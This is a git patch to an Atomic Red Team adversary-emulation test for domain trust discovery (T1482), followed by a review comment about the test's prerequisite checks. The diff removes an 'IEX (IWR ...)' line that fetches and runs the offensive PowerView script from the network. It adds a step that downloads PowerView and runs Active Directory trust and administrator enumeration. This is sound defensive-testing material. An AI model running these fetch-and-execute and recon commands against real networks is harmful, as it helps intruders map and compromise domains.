From a5cc28bdf2fff8f086e6f8a65e80a3c16a063c1d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Cl=C3=A9ment=20Notin?=
Date: Thu, 25 Jun 2020 23:43:24 +0200
Subject: [PATCH] T1482: add PowerView dependency & RSAT notes (#1041)

Co-authored-by: Carrie Roberts
---
 atomics/T1482/T1482.yaml | 29 ++++++++++++++++++++++++++++-
 1 file changed, 28 insertions(+), 1 deletion(-)

diff --git a/atomics/T1482/T1482.yaml b/atomics/T1482/T1482.yaml
index 363a951a34d..b10147bcc39 100644
--- a/atomics/T1482/T1482.yaml
+++ b/atomics/T1482/T1482.yaml
@@ -23,6 +23,13 @@ atomic_tests:
 This technique has been used by the Trickbot malware family.
 supported_platforms:
 - windows
+ dependencies:
+ - description: |
+ nltest.exe from RSAT must be present on disk
+ prereq_command: |
+ WHERE nltest.exe >NUL 2>&1
+ get_prereq_command: |
+ echo Sorry RSAT must be installed manually
 executor:
 name: command_prompt
 command: |
@@ -35,7 +42,27 @@ atomic_tests:
 Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.
 supported_platforms:
 - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ PowerView PowerShell script must exist on disk
+ prereq_command: |
+ if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1"
+ - description: |
+ RSAT PowerShell AD admin cmdlets must be installed
+ prereq_command: |
+ if ((Get-Command "Get-ADDomain") -And (Get-Command "Get-ADGroupMember")) { exit 0 } else { exit 1 }
+ get_prereq_command: |
+ Write-Host "Sorry RSAT must be installed manually"
 executor:
+ command: |
+ Import-Module "$env:TEMP\PowerView.ps1"
+ Get-NetDomainTrust
+ Get-NetForestTrust
+ Get-ADDomain
+ Get-ADGroupMember Administrators -Recursive
 name: powershell
 elevation_required: false
- command: IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Get-NetDomainTrust ; Get-NetForestTrust ; Get-ADDomain ; Get-ADGroupMember Administrators -Recursive
+
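Review bot: The PowerView `prereq_command` only checks that `$env:TEMP\PowerView.ps1` exists, so any file already at that user-writable path (stale, truncated by a failed download, or written by another process) passes the check and is then loaded by `Import-Module`. The download URL is already pinned to a commit, so the check can pin the content as well, for example `if ((Test-Path "$env:TEMP\PowerView.ps1") -and ((Get-FileHash "$env:TEMP\PowerView.ps1" -Algorithm SHA256).Hash -eq '<EXPECTED_SHA256>')) {exit 0} else {exit 1}`, with the placeholder replaced by the digest of the pinned file. Separately, in the RSAT check `Get-Command "Get-ADDomain"` writes an error record when the cmdlet is absent; adding `-ErrorAction SilentlyContinue` to both `Get-Command` calls keeps the prerequisite output limited to the pass/fail result. The test entry's name and description begin above this hunk.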